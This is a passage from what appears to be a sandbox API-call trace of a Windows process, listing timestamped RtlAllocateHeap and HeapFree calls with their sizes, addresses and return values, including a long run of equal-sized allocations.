dwFlags=0x0, lpMem=0x598ae0 | out: hHeap=0x580000) returned 1 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a7) returned 0x5993e0 [0155.837] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x58b410 [0155.837] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a7) returned 0x5a3790 [0155.839] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.839] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xfef7) returned 0x5adb40 [0155.841] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x40) returned 0x5908b0 [0155.841] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xfef7) returned 0x5bda40 [0155.842] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b410 | out: hHeap=0x580000) returned 1 [0155.842] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5adb40 | out: hHeap=0x580000) returned 1 [0155.843] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x450) returned 0x598910 [0155.843] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x450) returned 0x5cd940 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1ea7) returned 0x5cdda0 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xf40) returned 0x5993e0 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x7a0) returned 0x59a330 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cdda0 | out: hHeap=0x580000) returned 1 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xbf0) returned 0x5993e0 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59a330 | out: hHeap=0x580000) returned 1 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x640) returned 0x598910 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1247) returned 0x5cd940 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.844] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.844] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x520) returned 0x598910 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1b56) returned 0x5993e0 [0155.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8a0) returned 0x5cd940 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28ed) returned 0x59af40 [0155.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x550) returned 0x598910 [0155.845] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2537) returned 0x5cd940 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12b7) returned 0x5993e0 [0155.845] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x950) returned 0x59d840 [0155.846] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.846] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.846] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x3d4f) returned 0x59e1a0 [0155.846] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59af40 | out: hHeap=0x580000) returned 1 [0155.846] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59d840 | out: hHeap=0x580000) returned 1 [0155.846] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2377) returned 0x5cd940 [0155.846] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x11d7) returned 0x5a1f00 [0155.846] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8e0) returned 0x5993e0 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a1f00 | out: hHeap=0x580000) returned 1 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x5b0) returned 0x598910 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x640) returned 0x598910 [0155.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x5be2) returned 0x5adb40 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59e1a0 | out: hHeap=0x580000) returned 1 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x890) returned 0x5cd940 [0155.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.847] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xac0) returned 0x5cd940 [0155.848] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x58b410 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x960) returned 0x5cd940 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x960) returned 0x5ce2b0 [0155.848] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x460) returned 0x598910 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xe0f) returned 0x5cec20 [0155.848] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ce2b0 | out: hHeap=0x580000) returned 1 [0155.848] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c17) returned 0x5b3730 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xe00) returned 0x5cd940 [0155.848] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x700) returned 0x5b5350 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b3730 | out: hHeap=0x580000) returned 1 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x153d) returned 0x5b3730 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cec20 | out: hHeap=0x580000) returned 1 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b5350 | out: hHeap=0x580000) returned 1 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2277) returned 0x5cd940 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1157) returned 0x5b4c80 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8a0) returned 0x5b5de0 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b4c80 | out: hHeap=0x580000) returned 1 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1fc7) returned 0x5cd940 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b3730 | out: hHeap=0x580000) returned 1 [0155.849] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b5de0 | out: hHeap=0x580000) returned 1 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1657) returned 0x5b3730 [0155.849] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xb20) returned 0x5b4d90 [0155.850] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x590) returned 0x5cf910 [0155.923] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b3730 | out: hHeap=0x580000) returned 1 [0155.923] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b4d90 | out: hHeap=0x580000) returned 1 [0155.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2f96) returned 0x5b3730 [0155.923] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.923] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cf910 | out: hHeap=0x580000) returned 1 [0155.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b47) returned 0x5b66d0 [0155.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x15b7) returned 0x5cd940 [0155.923] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xad0) returned 0x5cef00 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b66d0 | out: hHeap=0x580000) returned 1 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cef00 | out: hHeap=0x580000) returned 1 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2697) returned 0x5b66d0 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1367) returned 0x5cd940 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9a0) returned 0x5cecb0 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b66d0 | out: hHeap=0x580000) returned 1 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x474d) returned 0x5b66d0 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b3730 | out: hHeap=0x580000) returned 1 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cecb0 | out: hHeap=0x580000) returned 1 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x920) returned 0x5cd940 [0155.924] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1b47) returned 0x5cd940 [0155.924] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xd90) returned 0x5bae30 [0155.925] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6d0) returned 0x5cf490 [0155.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bae30 | out: hHeap=0x580000) returned 1 [0155.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cf490 | out: hHeap=0x580000) returned 1 [0155.925] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x5d0) returned 0x598910 [0155.925] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6adf) returned 0x5993e0 [0155.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b66d0 | out: hHeap=0x580000) returned 1 [0155.925] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.925] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1887) returned 0x5cd940 [0155.925] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xc30) returned 0x5cf1d0 [0155.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x620) returned 0x598910 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cf1d0 | out: hHeap=0x580000) returned 1 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8f0) returned 0x5cd940 [0155.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x480) returned 0x598910 [0155.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x240) returned 0x5ce240 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ce240 | out: hHeap=0x580000) returned 1 [0155.926] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x40) returned 0x590db0 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b410 | out: hHeap=0x580000) returned 1 [0155.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5adb40 | out: hHeap=0x580000) returned 1 [0155.927] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.927] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x590db0 | out: hHeap=0x580000) returned 1 [0155.927] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9900) returned 0x5993e0 [0155.928] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1bf0) returned 0x5cd940 [0155.929] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.929] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9937) returned 0x5adb40 [0155.930] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.930] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x58b3b0 [0155.930] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9900) returned 0x5993e0 [0155.930] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1bf0) returned 0x5cd940 [0155.931] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cd940 | out: hHeap=0x580000) returned 1 [0155.931] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9937) returned 0x5cd940 [0155.932] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5993e0 | out: hHeap=0x580000) returned 1 [0155.932] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x40) returned 0x590630 [0155.932] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b3b0 | out: hHeap=0x580000) returned 1 [0155.932] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a3790 | out: hHeap=0x580000) returned 1 [0155.933] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bda40 | out: hHeap=0x580000) returned 1 [0155.933] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5908b0 | out: hHeap=0x580000) returned 1 [0155.933] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x5993e0 [0155.934] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x5b7480 [0155.934] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8) returned 0x588d40 [0155.934] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x5d7280 [0155.934] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5992a0 [0155.934] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x588d40 | out: hHeap=0x580000) returned 1 [0155.934] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x5ea490 [0155.935] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x599260 [0155.935] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5992a0 | out: hHeap=0x580000) returned 1 [0155.935] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x5fd6a0 [0155.935] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x58b410 [0155.935] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599260 | out: hHeap=0x580000) returned 1 [0155.935] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x6108b0 [0155.936] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x5984d0 [0155.936] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b410 | out: hHeap=0x580000) returned 1 [0155.936] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x623ac0 [0155.936] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x636cd0 [0155.937] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x48) returned 0x590220 [0155.937] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5984d0 | out: hHeap=0x580000) returned 1 [0155.937] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x649ee0 [0155.937] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x65d0f0 [0155.938] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1ea0080 [0155.938] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x68) returned 0x588d40 [0155.938] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x590220 | out: hHeap=0x580000) returned 1 [0155.938] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1eb3290 [0155.939] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1ec64a0 [0155.939] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1ed96b0 [0155.939] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1eec8c0 [0155.940] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x98) returned 0x5850b0 [0155.940] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x588d40 | out: hHeap=0x580000) returned 1 [0155.940] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1effad0 [0155.940] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f12ce0 [0155.940] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f25ef0 [0155.941] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f39100 [0155.941] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f4c310 [0155.942] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f5f520 [0155.942] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xe0) returned 0x584ce0 [0155.942] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5850b0 | out: hHeap=0x580000) returned 1 [0155.942] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1f72730 [0155.942] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fa0080 [0155.943] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fb3290 [0155.943] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fc64a0 [0155.944] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fd96b0 [0155.944] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fec8c0 [0155.945] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x1fffad0 [0155.945] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2012ce0 [0155.946] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2025ef0 [0155.946] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x150) returned 0x58b0b0 [0155.946] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x584ce0 | out: hHeap=0x580000) returned 1 [0155.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2039100 [0155.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x204c310 [0155.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x205f520 [0155.948] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2072730 [0155.948] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2085940 [0155.949] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2098b50 [0155.949] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x20abd60 [0155.949] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x20bef70 [0155.950] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x20d2180 [0155.950] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x20e5390 [0155.950] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x20f85a0 [0155.951] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x210b7b0 [0155.951] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x211e9c0 [0155.951] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2131bd0 [0155.952] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1f8) returned 0x598910 [0155.952] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b0b0 | out: hHeap=0x580000) returned 1 [0155.952] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2144de0 [0155.952] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2157ff0 [0155.952] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x216b200 [0155.953] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x217e410 [0155.953] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21a0080 [0155.954] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21b3290 [0155.954] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21c64a0 [0155.955] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21d96b0 [0155.955] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21ec8c0 [0155.955] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x21ffad0 [0155.956] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2212ce0 [0155.956] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2225ef0 [0155.957] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2239100 [0156.030] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x224c310 [0156.030] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x225f520 [0156.030] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2272730 [0156.031] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2285940 [0156.031] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2298b50 [0156.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x22abd60 [0156.032] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x22bef70 [0156.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x22d2180 [0156.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2f0) returned 0x598b10 [0156.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0156.033] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x22e5390 [0156.034] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x22f85a0 [0156.034] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x230b7b0 [0156.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x231e9c0 [0156.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2331bd0 [0156.035] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2344de0 [0156.036] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2357ff0 [0156.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x236b200 [0156.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x237e410 [0156.037] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2391620 [0156.038] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x23a4830 [0156.038] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x23b7a40 [0156.039] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x23cac50 [0156.039] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x23dde60 [0156.040] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x23f1070 [0156.040] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2404280 [0156.041] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2417490 [0156.041] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x242a6a0 [0156.041] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x243d8b0 [0156.042] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2450ac0 [0156.042] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2463cd0 [0156.042] 